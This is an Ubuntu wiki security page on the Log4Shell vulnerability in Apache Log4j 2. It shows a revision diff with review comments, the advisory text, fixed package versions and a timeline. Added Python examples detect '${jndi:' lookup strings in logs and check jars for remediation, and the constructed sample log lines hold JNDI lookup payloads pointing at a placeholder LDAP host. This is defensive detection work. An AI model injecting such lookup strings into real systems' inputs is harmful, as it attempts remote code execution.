Log4Shell

Differences between revisions 8 and 13 (spanning 5 versions)
Revision 8 as of 2021-12-16 08:27:04
Size: 3832
Comment:
Revision 13 as of 2021-12-17 08:57:11
Size: 3381
Comment: corrected 16.04 name
Deletions are marked like this. Additions are marked like this.
Line 3: Line 3:
== Remote code execution in Apache Log4j 2 (CVE-2021-44228 [aka Log4Shell]) == == Remote code execution in Apache Log4j 2 (CVE-2021-44228 aka Log4Shell) ==
Line 15: Line 15:
This issue was fixed in Apache Log4j2 in 2.15.0. Ubuntu 16.04 ESM, 18.04 LTS, 20.04 LTS, 21.04 and 21.10 were affected. To address the issue, ensure that appropriate versions of the `apache-log4j2` source package is installed, as listed below. These updates were announced in [[https://ubuntu.com/security/notices/USN-5192-1|USN 5192-1]] and [[https://ubuntu.com/security/notices/USN-5197-1|USN-5197-1]]. This issue was fixed in Apache Log4j2 in 2.15.0. Ubuntu 16.04 LTS, 18.04 LTS, 20.04 LTS, 21.04 and 21.10 were affected. To address the issue, ensure that appropriate versions of the `apache-log4j2` source package is installed, as listed below. These updates were announced in [[https://ubuntu.com/security/notices/USN-5192-1|USN 5192-1]] and [[https://ubuntu.com/security/notices/USN-5197-1|USN-5197-1]].
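Review bot: both the old and the new version of this line carry a number-agreement slip, "ensure that appropriate versions of the `apache-log4j2` source package is installed"; since the line is being edited anyway, "are installed" would read correctly. The renaming of 16.04 from "ESM" to "LTS" here also needs to be kept consistent with the 16.04 table row at Line 24/23 and with the ESM Apps note at Line 17.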
Line 17: Line 17:
NOTE: for Ubuntu 16.04 ESM, a Ubuntu Advantage subscription which provides access to ESM Apps is required as this update for `apache-log4j2` is available only via ESM Apps not ESM Infra.
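Review bot: dropping this NOTE removes the only statement that the 16.04 fix is available through ESM Apps and requires an Ubuntu Advantage subscription, while the 16.04 row that follows still lists `apache-log4j2 2.4-2ubuntu0.1~esm1`; a reader seeing the `~esm1` suffix after the release is relabelled "16.04 LTS" has no remaining hint of where the package comes from. If the release name is corrected, consider keeping a one-line pointer to ESM Apps next to the table row.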
Line 24: Line 23:
|| 16.04 ESM || [[ https://launchpad.net/ubuntu/+source/apache-log4j2/ | apache-log4j2 2.4-2ubuntu0.1~esm1 ]] || || 16.04 LTS || [[ https://launchpad.net/ubuntu/+source/apache-log4j2/ | apache-log4j2 2.4-2ubuntu0.1~esm1 ]] ||
Line 32: Line 31:
=== How to fix in Ubuntu ===

Type in a terminal:
{{{
$ sudo ua fix USN-5192-1
$ sudo ua fix USN-5197-1
}}}
Line 38: Line 45:
=== Products affected ===

These Canonical products contain components that are affected by this vulnerability.

 * [[https://ubuntu.com/security/CVE-2021-44228|Ubuntu Server]]

=== Products not affected ===

These Canonical products have been verified to not be affected by this vulnerability.

 * Charmed Kubernetes / microk8s
 * Charmed OpenStack
 * Anbox cloud

Remote code execution in Apache Log4j 2 (CVE-2021-44228 aka Log4Shell)

It was discovered that Apache Log4j2 JNDI features used in configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI-related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
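The trigger described above is a log message or parameter that contains a Log4j lookup string for the JNDI lookup. The following detection snippet is an added example, not part of the Ubuntu wiki page: it scans constructed web-server access-log lines for the literal `${jndi:` lookup form and reports the line number, the client address and the matched fragment, which is the minimum a responder wants when searching existing logs for exposure.

```python
"""Flag access-log lines that carry a Log4j JNDI lookup string.

Added example, not from the Ubuntu wiki page. The log lines are
constructed (addresses and hosts are placeholders) and the pattern
matches only the plain '${jndi:' lookup form.
"""
import re

# Log4j message lookups use the ${name:...} syntax; the JNDI lookup is ${jndi:...}.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

# Constructed sample input: two ordinary requests and two carrying a lookup string.
CONSTRUCTED_LOG = """\
10.0.0.5 - - [10/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Dec/2021:10:01:07 +0000] "GET /login HTTP/1.1" 200 731 "-" "${jndi:ldap://example.invalid/a}"
10.0.0.7 - - [10/Dec/2021:10:02:11 +0000] "GET /api HTTP/1.1" 404 92 "-" "curl/7.68.0"
10.0.0.9 - - [10/Dec/2021:10:02:40 +0000] "GET /?q=${JNDI:ldap://example.invalid/b} HTTP/1.1" 200 12 "-" "-"
"""


def find_jndi_lookups(text):
    """Return (line_number, client_ip, snippet) for every line containing a JNDI lookup string.

    The client IP is taken from the first space-separated field, as in the
    common/combined log format; the snippet is the 40 characters starting at
    the match so the reviewer sees the lookup without the whole line.
    """
    hits = []
    for number, line in enumerate(text.splitlines(), start=1):
        match = JNDI_LOOKUP.search(line)
        if match:
            client_ip = line.split(" ", 1)[0]
            hits.append((number, client_ip, line[match.start():match.start() + 40]))
    return hits


if __name__ == "__main__":
    for number, client_ip, snippet in find_jndi_lookups(CONSTRUCTED_LOG):
        print(f"line {number}: {client_ip}: {snippet}")
```

Run against real logs, the function is fed the file contents instead of `CONSTRUCTED_LOG`; a match is an indicator that a lookup string reached the application, not proof that it was evaluated, which depends on the Log4j version and configuration described on this page.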

In Ubuntu, Apache Log4j2 is packaged under the apache-log4j2 source package.

This issue was fixed in Apache Log4j2 in 2.15.0. Ubuntu 16.04 LTS, 18.04 LTS, 20.04 LTS, 21.04 and 21.10 were affected. To address the issue, ensure that the appropriate versions of the apache-log4j2 source package are installed, as listed below. These updates were announced in USN 5192-1 and USN-5197-1.

NOTE: Since Apache Log4j2 2.15.0 is deemed binary compatible with previous versions, this vulnerability was remediated for Ubuntu releases >= 20.04 LTS by upgrading apache-log4j2 to the new upstream version 2.15.0. For Ubuntu 18.04 LTS, however, to avoid the risk of regressions from the larger functional change that this new version brings, it was decided to remediate the vulnerability by removing the affected java/org/apache/logging/log4j/core/lookup/JndiLookup class entirely. This has the effect of disabling JNDI lookups for that release.
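The two remediations above leave different fingerprints in the shipped jar: the 20.04 LTS and later packages carry an upstream version of 2.15.0 or higher, while the 18.04 LTS package still reports an older version but no longer contains the JndiLookup class. The following checker is an added example, not code from the Ubuntu wiki page or the apache-log4j2 package; it classifies a log4j-core jar by those two signals, reading the version from the jar manifest's `Implementation-Version` entry, and inspects jars it constructs in memory so it runs offline. The sample version strings are constructed for the demonstration, not taken from the Ubuntu packages.

```python
"""Tell which Log4Shell remediation a Log4j 2 core jar carries.

Added example, not from the Ubuntu wiki page or the apache-log4j2 package.
It recognises the two remediations the page describes: an upstream version
of 2.15.0 or later, or removal of the JndiLookup class. The jars it inspects
are constructed in memory so the script runs offline.
"""
import io
import re
import zipfile

# Class whose removal disables JNDI lookups (path as given on the page).
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
# Entry prefix that identifies a log4j-core jar rather than some other jar.
CORE_PREFIX = "org/apache/logging/log4j/core/"
# First upstream release with the fix, per the page.
FIXED_VERSION = (2, 15, 0)


def parse_version(text):
    """Turn '2.15.0' into (2, 15, 0); None when the string has another shape."""
    m = re.fullmatch(r"(\d+)\.(\d+)\.(\d+)", text.strip())
    return tuple(int(p) for p in m.groups()) if m else None


def manifest_version(zf):
    """Read Implementation-Version from META-INF/MANIFEST.MF, if present."""
    try:
        manifest = zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
    except KeyError:
        return None
    for line in manifest.splitlines():
        if line.startswith("Implementation-Version:"):
            return parse_version(line.split(":", 1)[1])
    return None


def assess_jar_bytes(data):
    """Classify a jar given as bytes.

    Returns 'not-log4j-core', 'jndi-lookup-removed', 'patched-upstream',
    'vulnerable' or 'unknown-version'.
    """
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
        version = manifest_version(zf)
    if not any(name.startswith(CORE_PREFIX) for name in names):
        return "not-log4j-core"
    if JNDI_LOOKUP_CLASS not in names:
        return "jndi-lookup-removed"   # class stripped, as in the 18.04 LTS update
    if version is None:
        return "unknown-version"       # lookup class present, version not readable
    if version >= FIXED_VERSION:
        return "patched-upstream"      # 2.15.0 or later keeps the class but is fixed
    return "vulnerable"


def assess_jar_file(path):
    """Same classification for a jar on disk."""
    with open(path, "rb") as fh:
        return assess_jar_bytes(fh.read())


def build_sample_jar(version, with_jndi_lookup=True, core=True):
    """Construct a minimal jar for the demonstration; not a real Log4j build."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF",
                    f"Manifest-Version: 1.0\nImplementation-Version: {version}\n")
        if core:
            zf.writestr(CORE_PREFIX + "Logger.class", b"")
        if with_jndi_lookup:
            zf.writestr(JNDI_LOOKUP_CLASS, b"")
    return buf.getvalue()


if __name__ == "__main__":
    # Constructed samples covering each outcome.
    samples = {
        "old core jar, lookup class present": build_sample_jar("2.14.1"),
        "core jar with JndiLookup removed": build_sample_jar("2.11.1", with_jndi_lookup=False),
        "upstream 2.15.0 core jar": build_sample_jar("2.15.0"),
        "unrelated jar": build_sample_jar("1.0", with_jndi_lookup=False, core=False),
    }
    for label, data in samples.items():
        print(f"{label}: {assess_jar_bytes(data)}")
```

The class-presence test is checked before the version so that a jar whose manifest is missing or unreadable is still recognised as remediated when the lookup class is gone; a jar with the class present and no readable version is reported as unknown rather than guessed either way.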

How to fix in Ubuntu

Type in a terminal:

$ sudo ua fix USN-5192-1
$ sudo ua fix USN-5197-1

CVEs

Timeline

  • 2021 Dec 09: Vulnerability is publicly known
  • 2021 Dec 13: Updated packages for Ubuntu 18.04 LTS, 20.04 LTS, 21.04 and 21.10 are released
  • 2021 Dec 14: USN-5192-1 is published, announcing the availability of updated packages


SecurityTeam/KnowledgeBase/Log4Shell (last edited 2025-04-17 11:37:15 by lucistanescu)